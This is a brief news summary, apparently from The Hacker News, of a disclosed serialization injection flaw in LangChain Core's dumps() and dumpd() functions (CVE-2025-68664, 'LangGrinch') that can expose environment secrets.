Critical LangChain Core Vulnerability Exposes Secrets via Serialization Injection
Briefly

Critical LangChain Core Vulnerability Exposes Secrets via Serialization Injection
"A critical security flaw has been disclosed in LangChain Core that could be exploited by an attacker to steal sensitive secrets and even influence large language model (LLM) responses through prompt injection. LangChain Core (i.e., langchain-core) is a core Python package that's part of the LangChain ecosystem, providing the core interfaces and model-agnostic abstractions for building applications powered by LLMs."
""A serialization injection vulnerability exists in LangChain's dumps() and dumpd() functions," the project maintainers said in an advisory. "The functions do not escape dictionaries with 'lc' keys when serializing free-form dictionaries." "The 'lc' key is used internally by LangChain to mark serialized objects. When user-controlled data contains this key structure, it is treated as a legitimate LangChain object during deserialization rather than plain user data.""
LangChain Core contains a serialization injection vulnerability in its dumps() and dumpd() functions that fails to escape dictionaries with 'lc' keys. The 'lc' key marks LangChain objects in the framework's internal serialization format, so user-controlled data containing that structure is treated as objects during deserialization. An attacker able to force serialization and later deserialization of such data can instantiate arbitrary unsafe objects. Potential impacts include extraction of environment secrets when deserialization uses secrets_from_env=True and instantiation of classes from trusted namespaces such as langchain_core, langchain, and langchain_community. The flaw is tracked as CVE-2025-68664 and codenamed LangGrinch.
Read at The Hacker News
Unable to calculate read time
[
|
]